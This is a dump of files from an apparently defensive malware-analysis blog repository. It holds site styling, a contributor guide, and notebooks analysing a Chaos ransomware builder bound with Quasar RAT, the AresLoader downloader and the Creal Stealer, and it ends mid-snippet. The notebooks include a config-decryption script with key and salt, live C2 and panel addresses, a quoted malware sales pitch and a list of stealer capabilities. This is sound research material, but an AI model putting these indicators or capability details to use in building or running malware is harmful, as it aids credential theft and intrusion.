21 | color: lightgrey;
22 | }
23 |
24 | .page-content {
25 | -webkit-font-smoothing: antialiased !important;
26 | text-rendering: optimizeLegibility !important;
27 | font-family: "Segoe UI", SegoeUI, Roboto, "Segoe WP", "Helvetica Neue", "Helvetica", "Tahoma", "Arial", sans-serif !important;
28 | }
29 |
30 | // make non-headings slightly lighter
31 | .post-content p, .post-content li {
32 | font-size: 20px;
33 | color: #515151;
34 | }
35 |
36 | .post-link{
37 | font-weight: normal;
38 | }
39 |
40 | // change padding of headings
41 | h1 {
42 | margin-top:2.5rem !important;
43 | }
44 |
45 | h2 {
46 | margin-top:2rem !important;
47 | }
48 |
49 | h3, h4 {
50 | margin-top:1.5rem !important;
51 | }
52 |
53 | p {
54 | margin-top:1rem !important;
55 | margin-bottom:1rem !important;
56 | }
57 |
58 | h1, h2, h3, h4 {
59 | font-weight: normal !important;
60 | margin-bottom:0.5rem !important;
61 | code {
62 | font-size: 100%;
63 | }
64 | }
65 |
66 | pre {
67 | margin-bottom:1.5rem !important;
68 | }
69 |
70 | // make sure the post title doesn't have too much spacing
71 | .post-title { margin-top: .5rem !important; }
72 |
73 | li {
74 | h3, h4 {
75 | margin-top:.05rem !important;
76 | margin-bottom:.05rem !important;
77 | }
78 | .post-meta-description {
79 | color: rgb(88, 88, 88);
80 | font-size: 15px;
81 | margin-top:.05rem !important;
82 | margin-bottom:.05rem !important;
83 | }
84 | }
85 |
86 |
87 |
88 | // Code Folding
89 | details.description[open] summary::after {
90 | content: attr(data-open);
91 | }
92 |
93 | details.description:not([open]) summary::after {
94 | content: attr(data-close);
95 | }
96 |
97 | // Notebook badges
98 | .notebook-badge-image {
99 | border:0 !important;
100 | }
101 |
102 | // Adjust font size for footnotes.
103 | .footnotes {
104 | font-size: 12px !important;
105 | p, li{
106 | font-size: 12px !important;
107 | }
108 | }
109 |
110 | // Adjust width of social media icons that were getting cut off
111 | .social-media-list{
112 | .svg-icon {
113 | width: 25px !important;
114 | height: 23px !important;
115 | }
116 | }
117 |
118 | // Make Anchor Links Appear Only on Hover
119 |
120 | .anchor-link {
121 | opacity: 0;
122 | padding-left: 0.375em;
123 | -webkit-text-stroke: 1.75px white;
124 | -webkit-transition: opacity 0.2s ease-in-out 0.1s;
125 | -moz-transition: opacity 0.2s ease-in-out 0.1s;
126 | -ms-transition: opacity 0.2s ease-in-out 0.1s;
127 | }
128 |
129 | h1:hover .anchor-link,
130 | h2:hover .anchor-link,
131 | h3:hover .anchor-link,
132 | h4:hover .anchor-link,
133 | h5:hover .anchor-link,
134 | h6:hover .anchor-link {
135 | opacity: 1;
136 | }
137 |
138 |
139 | // category tags
140 | .category-tags {
141 | margin-top: .25rem !important;
142 | margin-bottom: .25rem !important;
143 | font-size: 105%;
144 | }
145 |
146 | // Custom styling for homepage post previews
147 | .post-meta-title, .post-meta{
148 | margin-top: .25em !important;
149 | margin-bottom: .25em !important;
150 | font-size: 105%;
151 | }
152 |
153 | .page-description {
154 | margin-top: .5rem !important;
155 | margin-bottom: .5rem !important;
156 | color: #585858;
157 | font-size: 115%;
158 | }
159 |
160 | // Custom styling for category tags
161 | .category-tags-icon {
162 | font-size: 75% !important;
163 | padding-left: 0.375em;
164 | opacity: 35%;
165 | }
166 | .category-tags-link {
167 | color:rgb(187, 129, 129) !important;
168 | font-size: 13px !important;
169 | }
170 |
171 | // Search Page Styles
172 | .js-search-results {padding-top: 0.2rem;}
173 | .search-results-list-item {padding-bottom: 1rem;}
174 | .search-results-list-item .search-result-title {
175 | font-size: 16px;
176 | color: #d9230f;
177 | }
178 | .search-result-rel-url {color: silver;}
179 | .search-results-list-item a {display: block; color: #777;}
180 | .search-results-list-item a:hover, .search-results-list-item a:focus {text-decoration: none;}
181 | .search-results-list-item a:hover .search-result-title {text-decoration: underline;}
182 |
183 | .search-result-rel-date {
184 | color: rgb(109, 120, 138);
185 | font-size: 14px;
186 | }
187 |
188 | .search-result-preview {
189 | color: #777;
190 | font-size: 16px;
191 | margin-top:.02rem !important;
192 | margin-bottom:.02rem !important;
193 | }
194 | .search-result-highlight {
195 | color: #2e0137;
196 | font-weight:bold;
197 | }
198 |
199 | table {
200 | white-space: normal;
201 | max-width: 100%;
202 | font-size: 100%;
203 | border:none;
204 | th{
205 | text-align: center !important;
206 | }
207 | }
208 |
209 | // customize scrollbars
210 | ::-webkit-scrollbar {
211 | width: 14px;
212 | height: 18px;
213 | }
214 | ::-webkit-scrollbar-thumb {
215 | height: 6px;
216 | border: 4px solid rgba(0, 0, 0, 0);
217 | background-clip: padding-box;
218 | -webkit-border-radius: 7px;
219 | background-color: #9D9D9D;
220 | -webkit-box-shadow: inset -1px -1px 0px rgba(0, 0, 0, 0.05), inset 1px 1px 0px rgba(0, 0, 0, 0.05);
221 | }
222 | ::-webkit-scrollbar-button {
223 | width: 0;
224 | height: 0;
225 | display: none;
226 | }
227 | ::-webkit-scrollbar-corner {
228 | background-color: transparent;
229 | }
230 |
231 | // Wrap text outputs instead of horizontal scroll
232 | .output_text.output_execute_result {
233 | pre{
234 | white-space: pre-wrap;
235 | }
236 | }
237 |
238 |
239 | // Handling large charts on mobile devices
240 | // @media only screen and (max-width: 1200px) {
241 | // /* for mobile phone and tablet devices */
242 | .output_wrapper{
243 | overflow: auto;
244 | }
245 | // }
246 |
247 | .svg-icon.orange{
248 | width: 30px;
249 | height: 23px;
250 | }
251 |
252 | .code_cell {
253 | margin: 1.5rem 0px !important;
254 | }
255 |
256 | pre code {
257 | font-size: 15px !important;
258 | }
259 |
260 | // Handle youtube videos, so they dont break on mobile devices
261 | .youtube-iframe-wrapper {
262 | position: relative;
263 | padding-bottom: 56.10%;
264 | height: 0;
265 | overflow: hidden;
266 | }
267 |
268 | .youtube-iframe-wrapper iframe,
269 | .youtube-iframe-wrapper object,
270 | .youtube-iframe-wrapper embed {
271 | position: absolute;
272 | top: 0;
273 | left: 0;
274 | width: 100%;
275 | height: 100%;
276 | }
277 |
--------------------------------------------------------------------------------
/_notebooks/2023-04-13-quasar-chaos.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "32353fa6-6311-459f-96ee-7f31d6edfa84",
6 | "metadata": {},
7 | "source": [
8 | "# Quasar Chaos\n",
9 | "> Open Source Ransomware Meets Open Source RAT\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [Quasar,Chaos,RAT,Ransomware]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "3164276f-ff44-4120-9054-282a1a33493a",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "a4326c6f-e720-45fb-b779-d66ae32eef1b",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "This sample appears to be a Chaos Ransomware builder but it is actually bound with Quasar RAT!!\n",
31 | "\n",
32 | "- Binder: [Celesty Binder](https://github.com/cymilad/Celesty_Binder)\n",
33 | "- PDB path: `C:\\Users\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb`\n",
34 | "- Chaos Ransomware [malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos)\n",
35 | "\n",
36 | "\n",
37 | "\n",
38 | "## Samples\n",
39 | "- `141056b82cd0a20495822cd2bcd5fae5c989c6d24dac5a5e3c3916f1b406bdb9` [UnpacMe](https://www.unpac.me/results/f56d1ef0-daf5-4da7-b8cb-b2438fe30379#/)"
40 | ]
41 | },
42 | {
43 | "cell_type": "markdown",
44 | "id": "6447e821-4e87-4736-8ddb-358c3739d669",
45 | "metadata": {},
46 | "source": [
47 | "## Chaos Builder\n",
48 | "Chaos Ransomware builder is an open source project that can be found on GitHub [ChaosRansomwareBuilderVersion4](https://github.com/GlebYoutuber/ChaosRansomwareBuilderVersion4). It appears that this project was compiled then the Celesty Binder was used to bind the ransomware builder with Quasar RAT. Both the builder and the RAT can be found in the resources section of the binder exe.\n",
49 | "\n",
50 | "The extracted builder is a clean build and will work on its own `f2665f89ba53abd3deb81988c0d5194992214053e77fc89b98b64a31a7504d77`\n",
51 | "\n",
52 | "\n",
53 | "## Quasar RAT\n",
54 | "Quasar is ostensibly a \"remote administration tool\" (RAT) that is open source and available on GitHub [Quasar](https://github.com/quasar/Quasar). Looking through the source this appears to be developed for the purpose of unauthorized remote access to victims and includes a [configuration](https://github.com/quasar/Quasar/blob/master/Quasar.Client/Config/Settings.cs) that could turn this into a malicious RAT. \n",
55 | "\n",
56 | "The extracted RAT `d8b36742b4c5cf9ce5ce58ac859c4162fb127298dfd3f15fa4f101c0cb878bda`\n",
57 | "\n",
58 | "### Analysis \n",
59 | "\n",
60 | "The strings in the RAT (config) are encrypted using Base64 and AES CBC. "
61 | ]
62 | },
63 | {
64 | "cell_type": "code",
65 | "execution_count": 5,
66 | "id": "1a8eff35-b1d5-4949-a304-72606c4a9f7e",
67 | "metadata": {},
68 | "outputs": [
69 | {
70 | "name": "stdout",
71 | "output_type": "stream",
72 | "text": [
73 | "b'1.3.0.0\\t\\t\\t\\t\\t\\t\\t\\t\\t'\n",
74 | "b'66.63.167.164:55640;\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c'\n",
75 | "b'\\xf6H\\xcf\\xc9\\x87`\\x96\\xb7N\\xe7O\\xf1i\\x8d\\xc1\\xf7'\n",
76 | "b'SubDir\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n'\n",
77 | "b'Client.exe\\x06\\x06\\x06\\x06\\x06\\x06'\n",
78 | "b'QSR_MUTEX_M6ajmD3hhoJo7CTsvN\\x04\\x04\\x04\\x04'\n",
79 | "b'Quasar Client Startup\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b'\n",
80 | "b'Ransomware\\x06\\x06\\x06\\x06\\x06\\x06'\n",
81 | "b'Logs\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c'\n"
82 | ]
83 | }
84 | ],
85 | "source": [
86 | "import base64\n",
87 | "import malduck\n",
88 | "from Crypto.Protocol.KDF import PBKDF2\n",
89 | "\n",
90 | "\n",
91 | "\n",
92 | "\n",
93 | "string_data = 'muoBJw7vz107HYcI4tyRBz0XVW2kCA367J52yCDjuHUkVGWPKkpXUgV5Q1/s4HNhSAMJDhTJwYIa3MxqdMkg7A=='\n",
94 | "\n",
95 | "string_data_b64 = base64.b64decode(string_data)\n",
96 | "string_data_b64 = string_data_b64[32:]\n",
97 | "iv = string_data_b64[:16]\n",
98 | "enc_data = string_data_b64[16:]\n",
99 | "\n",
100 | "key_data = \"SM73jcn259KtoJ4uPciZ\"\n",
101 | "\n",
102 | "iterations = 50000\n",
103 | "salt = bytes([191,235,30,86,251,205,151,59,178,25,2,36,48,165,120,67,0,61,86,68,210,30,98,185,212,241,128,231,230,195,57,65])\n",
104 | "\n",
105 | "\n",
106 | "key = PBKDF2(key_data, salt, count=iterations)\n",
107 | "\n",
108 | "\n",
109 | "strings = [\n",
110 | "\"3DaXS6MYqYL9Q/3WF/cPdbdoy2NggCqoSmasPYwzkPD389j4IoSZZVQHHz196cPEy2h4VSsjy7se22/++XH89w==\",\n",
111 | "\"U2MkYAPUljFBQRO9iIkRZVGmxS2mOB+3klWr1xcKn3OqiosSod4C8iKk+GmogWRVZ6xUFktvHtwFnyOxg+ZSLPjbO+3+OdrVI8o+NK7UCZA=\",\n",
112 | "\"1WvgEMPjdwfqIMeM9MclyQ==\",\n",
113 | "\"NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==\",\n",
114 | "\"NX2L76Nud+1o8CF2fRs8qiHu4v2wb0E701jiqZNY+WP0X+oOZUuIpza8zsipPF550Uz4XlYTbeon9njxoQ2MBA==\",\n",
115 | "\"DQSIoMapurAvRyZWC74v/c0E7zcV+8LgDPpOmChR453N+Cj+6Fwipe5tbYPbhkpNhwf9hEy/78hh8qB6c1B3nw==\",\n",
116 | "\"p56HD6/EQvRGDzCuDAjko6aJqVPRc/Mug3q2bslOWAZN8H2n4vy8m3x0RtwAUXh5C6kG15y+qrvsfs2s4qJHQBdKg5BmNrg62YncQ9tG5TE=\",\n",
117 | "\"xf05S4o+UGg6gPS2slPSroORS4DLfYXnHiWz6VyhTQOpNKzIHxhEvDSTlPMFUIek3Wi3lCxroWOHJr9WeGvvHe6fxXcVPTWnPs4YiYTbmfs=\",\n",
118 | "\"muoBJw7vz107HYcI4tyRBz0XVW2kCA367J52yCDjuHUkVGWPKkpXUgV5Q1/s4HNhSAMJDhTJwYIa3MxqdMkg7A==\",\n",
119 | "\"B0T3cryizrl4VOcnw40TDxor8c5ycs9chw7RjsLxM2h+rS/BlcPa2ZW4po/PpJXob3byyEj4GOuWUPn+M4Shcg==\"]\n",
120 | "\n",
121 | "\n",
122 | "for s in strings:\n",
123 | " try:\n",
124 | " string_data_b64 = base64.b64decode(s)\n",
125 | " string_data_b64 = string_data_b64[32:]\n",
126 | " iv = string_data_b64[:16]\n",
127 | " enc_data = string_data_b64[16:]\n",
128 | " out = malduck.aes.cbc.decrypt(key, iv, enc_data)\n",
129 | " print(out)\n",
130 | " except:\n",
131 | " pass\n",
132 | "\n"
133 | ]
134 | },
135 | {
136 | "cell_type": "code",
137 | "execution_count": null,
138 | "id": "5c0bee7f-4d2b-4492-a40a-47b50865fe27",
139 | "metadata": {},
140 | "outputs": [],
141 | "source": []
142 | }
143 | ],
144 | "metadata": {
145 | "kernelspec": {
146 | "display_name": "Python 3",
147 | "language": "python",
148 | "name": "python3"
149 | },
150 | "language_info": {
151 | "codemirror_mode": {
152 | "name": "ipython",
153 | "version": 3
154 | },
155 | "file_extension": ".py",
156 | "mimetype": "text/x-python",
157 | "name": "python",
158 | "nbconvert_exporter": "python",
159 | "pygments_lexer": "ipython3",
160 | "version": "3.9.5"
161 | }
162 | },
163 | "nbformat": 4,
164 | "nbformat_minor": 5
165 | }
166 |
--------------------------------------------------------------------------------
/_notebooks/2023-04-02-aresloader.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "65fde09f-6b34-4627-ad8e-cf238dc703e2",
6 | "metadata": {},
7 | "source": [
8 | "# AresLoader\n",
9 | "> Taking a closer look at this new loader\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [ares,aresloader,loader]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "2e55128d-8b95-4a5f-a0f0-17a79ac65e57",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "88fecbb4-9283-4336-ad6d-db81a165ab02",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "\n",
31 | "AresLoader is a new malware downloader that has been advertised on some underground forums.\n",
32 | "\n",
33 | "### References \n",
34 | "\n",
35 | "- [New loader on the bloc - AresLoader](https://intel471.com/blog/new-loader-on-the-bloc-aresloader)\n",
36 | "- [Private Malware for Sale: A Closer Look at AresLoader](https://flashpoint.io/blog/private-malware-for-sale-aresloader/)\n",
37 | "\n",
38 | "### Samples \n",
39 | "\n",
40 | "- `7572b5b6b1f0ea8e857de568898cf97139c4e5237b835c61fea7d91a6f1155fb` [UnpacMe](https://www.unpac.me/results/346ab69e-9378-416a-8387-6dae0b87bf58)\n",
41 | "\n",
42 | "### Panels\n",
43 | "\n",
44 | "The following were live panels at the time of analysis (thanks [@lloydlabs](https://twitter.com/lloydlabs))\n",
45 | "\n",
46 | "```\n",
47 | " 45.80.69[.]193\n",
48 | " 37.220.87[.]52\n",
49 | "```\n",
50 | "\n",
51 | "### Note From The Developers\n",
52 | "\n",
53 | "From the the developers themselves!\n",
54 | "\n",
55 | "```\n",
56 | "Dear Customer.\n",
57 | "Here will be described the advantages, the rules of using the lowers you are renting.\n",
58 | "\n",
59 | "Product name: AresLoader.\n",
60 | "\n",
61 | "\n",
62 | "Monthly lease will cost $300. There are no discounts provided. Price includes: 5 rebuilds ( including the first one ), each with a partial stub cleanup ( uniqueization of the binary signature ). Any rebuild after that will cost $50, and this may take some time, since this service is manual, but we will not keep you waiting. \n",
63 | "In addition, manual morphing code (for each build it is different).\n",
64 | "\n",
65 | "==============================\n",
66 | "The way AresLoader works is that it presents itself as legitimate software (not a required feature) and then downloads the payload and puts it on the disk wherever you want. Before launching the payload, Ares launches a legitimate file.\n",
67 | "\n",
68 | "AresLoader can ask the user admin rights (until he allows it) on behalf of cmd.exe and afterwards transfer the rights from cmd.exe to the payload. \n",
69 | "\n",
70 | "Ares supports the ability to load encrypted payloads using AES/RSA ciphers ( only use your own encoder to avoid decryption problems )\n",
71 | "\n",
72 | "For more details about the work and functionality of the builder - contact the team, we are ready to answer any question. As the builder is in the form of a constructor, they can arise.\n",
73 | "\n",
74 | "Due to the fact that the Lauder will be improved and we will be introducing different updates, they may be free or for a fee. In any case, we will notify you about updates and explain what and where they will be updated/modernized. \n",
75 | "\n",
76 | "===============================\n",
77 | "\n",
78 | "\n",
79 | "\n",
80 | "There are rules for use. Attempts to change or break them will be treated critically, up to and including blocking the user. \n",
81 | "\n",
82 | " 1. Resale of license is FORBIDDEN. \n",
83 | " 2. We are not responsible for any loss to the renter. \n",
84 | " 4. It is forbidden to post the Lowder binary file in the public domain. \n",
85 | " 5. It is forbidden to upload the loeder to Virus Total.\n",
86 | "\n",
87 | "\n",
88 | "For our part, the Development team is ready to ensure the comfortable use of our product. Soon we will be adding new updates and other additions to the functionality to improve the performance, increasing the potential of using our AresLoader. In case of any questions we are ready to get in touch with you at any convenient time and solve any arising problems. We are looking for long-term cooperation and diligent customers. \n",
89 | "\n",
90 | "\n",
91 | "Sincerely, developers.\n",
92 | "```\n",
93 | "\n"
94 | ]
95 | },
96 | {
97 | "cell_type": "markdown",
98 | "id": "33096db8-ab3b-4175-857f-14a7ebc9e740",
99 | "metadata": {},
100 | "source": [
101 | "## Analysis\n",
102 | "\n",
103 | "The first stage is \"packed\" with fake API calls used to obscure a simple shellcode loader. The loader loads the 2nd stage onto the heap and executes it (yes you read the right, the heap).\n",
104 | "\n",
105 | "### Stage 2\n",
106 | "\n",
107 | "The 2nd stage uses a custom decryption algorithm to decrypt the final stage which is loaded into a RWX section and executed. The decryption algorithm was previously observed in a malware dubbed [BUGHATCH](https://www.elastic.co/security-labs/bughatch-malware-analysis) by elastic. The overlap between the two malware families is currently unclear.\n",
108 | "\n",
109 | "### Stage 3\n",
110 | "The 3rd and final stage is composed of some shellcode and the AresLoader payload PE file. The shellode is used to execute the PE file.\n",
111 | "\n",
112 | "Based on the strings in the payload this sample is .... `AresLdr_v_3`\n",
113 | "\n",
114 | "The 3rd stage appears to have been around since at least 2021 in some form as this analysis report describes a most of the same functionality [Anatomy of a simple and popular packer](https://malware.news/t/anatomy-of-a-simple-and-popular-packer/48537). \n",
115 | "\n",
116 | "The purpose of the loader is to download and launch a final malware payload (technically making this a downloader not a loader). The download URLs are in plain text in the final stage and the payload is executed via `CreateProcessA`. \n"
117 | ]
118 | },
119 | {
120 | "cell_type": "code",
121 | "execution_count": null,
122 | "id": "5e8d5f2e-a8f6-4b1e-bd1a-96e753a3d7c7",
123 | "metadata": {},
124 | "outputs": [],
125 | "source": []
126 | }
127 | ],
128 | "metadata": {
129 | "kernelspec": {
130 | "display_name": "Python 3",
131 | "language": "python",
132 | "name": "python3"
133 | },
134 | "language_info": {
135 | "codemirror_mode": {
136 | "name": "ipython",
137 | "version": 3
138 | },
139 | "file_extension": ".py",
140 | "mimetype": "text/x-python",
141 | "name": "python",
142 | "nbconvert_exporter": "python",
143 | "pygments_lexer": "ipython3",
144 | "version": "3.9.5"
145 | }
146 | },
147 | "nbformat": 4,
148 | "nbformat_minor": 5
149 | }
150 |
--------------------------------------------------------------------------------
/_fastpages_docs/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | _Adapted from [fastai/nbdev/CONTRIBUTING.md](https://github.com/fastai/nbdev/blob/master/CONTRIBUTING.md)_
2 |
3 | # How to contribute to fastpages
4 |
5 | First, thanks a lot for wanting to help! Some things to keep in mind:
6 |
7 | - The jupyter to blog post conversion functionality relies on [fastai/nbdev](https://github.com/fastai/nbdev). For idiosyncratic uses of nbdev that only apply to blogs that would require a large refactor to nbdev, it might be acceptable to apply a [monkey patch](https://stackoverflow.com/questions/5626193/what-is-monkey-patching) in `fastpages`. However, it is encouraged to contribute to `nbdev` where possible if there is a change that could unlock a new feature. If you are unsure, please open an issue in this repo to discuss.
8 |
9 |
10 | ## Note for new contributors from Jeremy
11 |
12 | It can be tempting to jump into a new project by questioning the stylistic decisions that have been made, such as naming, formatting, and so forth. This can be especially so for python programmers contributing to this project, which is unusual in following a number of conventions that are common in other programming communities, but not in Python. However, please don’t do this, for (amongst others) the following reasons:
13 |
14 | - Contributing to [Parkinson’s law of triviality](https://www.wikiwand.com/en/Law_of_triviality) has negative consequences for a project. Let’s focus on deep learning!
15 | - It’s exhausting to repeat the same discussion over and over again, especially when it’s been well documented already. When you have a question about the project, please check the pages in the docs website linked here.
16 | - You’re likely to get a warmer welcome from the community if you start out by contributing something that’s been requested on the forum, since you’ll be solving someone’s current problem.
17 | - If you start out by just telling us your point of view, rather than studying the background behind the decisions that have been made, you’re unlikely to be contributing anything new or useful.
18 | - I’ve been writing code for nearly 40 years now, across dozens of languages, and other folks involved have quite a bit of experience too - the approaches used are based on significant experience and research. Whilst there’s always room for improvement, it’s much more likely you’ll be making a positive contribution if you spend a few weeks studying and working within the current framework before suggesting wholesale changes.
19 |
20 |
21 | ## Did you find a bug?
22 |
23 | * Nobody is perfect, especially not us. But first, please double-check that the bug doesn't come from something on your side. The [forum](http://forums.fast.ai/) is a tremendous source for help, and we'd advise using it as a first step. Be sure to include as much code as you can so that other people can easily help you.
24 | * Then, ensure the bug was not already reported by searching on GitHub under [Issues](https://github.com/fastai/fastpages/issues).
25 | * If you're unable to find an open issue addressing the problem, [open a new one](https://github.com/fastai/fastpages/issues/new). Be sure to include a title and clear description, as much relevant information as possible, and a code sample or an executable test case demonstrating the expected behavior that is not occurring.
26 | * Be sure to add the complete error messages.
27 |
28 | #### Did you write a patch that fixes a bug?
29 |
30 | * Open a new GitHub pull request with the patch.
31 | * Ensure that your PR includes a test that fails without your patch, and passes with it.
32 | * Ensure the PR description clearly describes the problem and solution. Include the relevant issue number if applicable.
33 | * Before submitting, please be sure you abide by our [coding style](https://docs.fast.ai/dev/style.html) (where appropriate) and [the guide on abbreviations](https://docs.fast.ai/dev/abbr.html) and clean-up your code accordingly.
34 |
35 | ## Do you intend to add a new feature or change an existing one?
36 |
37 | * You can suggest your change on the [fastai forum](http://forums.fast.ai/) to see if others are interested or want to help.
38 | * Once your approach has been discussed and confirmed on the forum, you are welcome to push a PR, including a complete description of the new feature and an example of how it's used. Be sure to document your code in the notebook.
39 | * Ensure that your code includes tests that exercise not only your feature, but also any other code that might be impacted.
40 |
41 | ## PR submission guidelines
42 |
43 | Some general rules of thumb that will make your life easier.
44 |
45 | * Test locally before opening a pull request. See [the development guide](_fastpages_docs/DEVELOPMENT.md) for instructions on how to run fastpages on your local machine.
46 | * When you do open a pull request, please request a draft build of your PR by making a **comment with the magic command `/preview` in the pull request.** This will allow reviewers to see a live-preview of your changes without having to clone your branch.
47 |   * You can do this multiple times, if necessary, to rebuild your preview after changes. But please do not abuse this; test locally before requesting a preview build.
48 |
49 | * Keep each PR focused. While it's more convenient, do not combine several unrelated fixes together. Create as many branches as needed to keep each PR focused.
50 | * Do not mix style changes/fixes with "functional" changes. It's very difficult to review such PRs and they will most likely get rejected.
51 | * Do not add/remove vertical whitespace. Preserve the original style of the file you edit as much as you can.
52 | * Do not turn an already submitted PR into your development playground. If after you submitted PR, you discovered that more work is needed - close the PR, do the required work and then submit a new PR. Otherwise each of your commits requires attention from maintainers of the project.
53 | * If, however, you submitted a PR and received a request for changes, you should proceed with commits inside that PR, so that the maintainer can see the incremental fixes and won't need to review the whole PR again. In the exceptional case where you realize it will take many, many commits to complete the requests, it's probably best to close the PR, do the work, and then submit it again. Use common sense when choosing one way over the other.
54 | * When you open a pull request, you can generate a live preview build of how the blog site will look by making a comment in the PR that contains this command: `/preview`. GitHub will build your site and drop a temporary link for everyone to review. You can do this multiple times if necessary; however, as mentioned previously, do not turn an already submitted PR into a development playground.
55 |
56 | ## Do you have questions about the source code?
57 |
58 | * Please ask it on the [fastai forum](http://forums.fast.ai/) (after a quick search to make sure someone hasn't already asked the same question). We'd rather have as many discussions as possible there so that the largest number of people can benefit from them.
59 |
60 | ## Do you want to contribute to the documentation?
61 |
62 | * PRs are welcome for this. For any confusion about the documentation, please feel free to open an issue on this repo.
63 |
64 |
--------------------------------------------------------------------------------
/_notebooks/2024-05-12-python-malware.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# Python Malware Triage - Creal Stealer\n",
8 | "> A Few Tips To Help With PyInstaller And Friends\n",
9 | "\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [python,pyinstaller,triage,creal-stealer,creal]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "metadata": {},
18 | "source": [
19 | "## Overview\n",
20 | "\n",
21 | "Just a few tips and tricks for analyzing python malware...\n",
22 | "\n",
23 | "## Sample\n",
24 | "- `21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a` [UnpacMe](https://www.unpac.me/results/4667304e-fc1d-4fb2-9aec-d4b6e62e18ab?hash=21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a)\n",
25 | "\n",
26 | "## References \n",
27 | "- [Malware Analysis For Hedgehogs - Python Malware In 30sec](https://www.youtube.com/shorts/ETvzwJo0Pa0)\n",
28 | "- [Python Malware Cheatsheet (also Malware Anlaysis For Hedgehogs)](https://struppigel.github.io/WisdomForHedgehogs/Execution%20Environments/CPython%20Bytecode%20Reversing/)\n",
29 | "\n",
30 | "## Creal Stealer\n",
31 | "Creal Stealer is an open source Python stealer shared on GitHub [Ayhuuu/Creal-Stealer)](https://github.com/Ayhuuu/Creal-Stealer). Though the stealer is open source the developer operates a Telegram channel which offers a \"Premium\" version of the stealer if you contact them.\n",
32 | "\n",
33 | "\n",
34 | "\n",
35 | "### Capabilites \n",
36 | "The stealer has a simple discord webhook upload config where the operator can specify a discord to upload the stolen information. According to the developer the stealer is undetected in VirusTotal but this is obviously [not the case](https://www.virustotal.com/gui/file/21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a) in practice. \n",
37 | "\n",
38 | "The following stealer feaures are listed on the GitHub page.\n",
39 | "- Discord Information ⚔️\n",
40 | " - Nitro\n",
41 | " - Badges\n",
42 | " - Billing\n",
43 | " - Email\n",
44 | " - Phone\n",
45 | " - HQ Friends\n",
46 | " - HQ Guilds\n",
47 | " - Gift Codes\n",
48 | "- General Functions \n",
49 | " - Check if being run in a VirusTotal sandbox\n",
50 | " - Adds file to startup\n",
51 | " - Anti-Debug / Anti-VM / Anti-RDP / Blue Screen if detect\n",
52 | "- Discord Injection \n",
53 | " - Send token, password, email and billing on login or when email/password is changed\n",
54 | "- Browser Data\n",
55 | " - Cookies\n",
56 | " - Passwords\n",
57 | " - Histories\n",
58 | " - Autofills\n",
59 | " - Bookmarks\n",
60 | " - Credit/Debit Cards\n",
61 | " - From Chrome, Edge, Brave, Opera GX, and more...\n",
62 | "- Crypto Data \n",
63 | " - Extensions (MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Binance Wallet and +40 wallets supported)\n",
64 | " - Softwares (Exodus, Atomic, Guarda, Electrum, Zcash, Armory, Binance, Coinomi)\n",
65 | " - Seedphrases and backup codes\n",
66 | "- Application Data \n",
67 | " - Steam\n",
68 | " - Riot Games\n",
69 | " - Telegram\n",
70 | "- System Information ⚙️\n",
71 | " - User\n",
72 | " - System\n",
73 | " - Disk\n",
74 | " - Network\n",
75 | "- File Stealer\n",
76 | " - Grabs Seed Phrases, Tokens, Private Keys, Recovery Codes, Backup Codes, 2FA codes\n",
77 | "\n",
78 | "\n"
79 | ]
80 | },
81 | {
82 | "cell_type": "markdown",
83 | "metadata": {},
84 | "source": [
85 | "## Analysis\n",
86 | "Though we are analyzing a creal sample a similar process can be followed for most python malware.\n",
87 | "\n",
88 | "### PyInstaller\n",
89 | "The malware comes bundled in a [PyInstaller](https://pyinstaller.org/) EXE which can be extracted using [https://github.com/pyinstxtractor/pyinstxtractor-ng]. Once extracted the bundled python interpreter, libraries, and compiled python files (`.pyc`) will be accessible.\n",
90 | "\n",
91 | "The Python interpreter DLL will have the Python version name listed in its name. Determining the version is important for the next step in the analysis process. We can also see the `creal.pyc` compiled Creal stealer module has been dumped.\n",
92 | "\n",
93 | "\n",
94 | "\n",
95 | "\n"
96 | ]
97 | },
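98 | {
99 | "cell_type": "markdown",
100 | "metadata": {},
101 | "source": [
102 | "As a quick sanity check, the CPython version can also be read from the magic number at the start of each extracted `.pyc` file. The helper below is our own minimal sketch (not part of any of the tools above), using a few well known release magic values; the full list lives in CPython's `Lib/importlib/_bootstrap_external.py`.\n",
103 | "\n",
104 | "```python\n",
105 | "import struct\n",
106 | "\n",
107 | "# Release pyc magic numbers for recent CPython versions (first two bytes, little-endian)\n",
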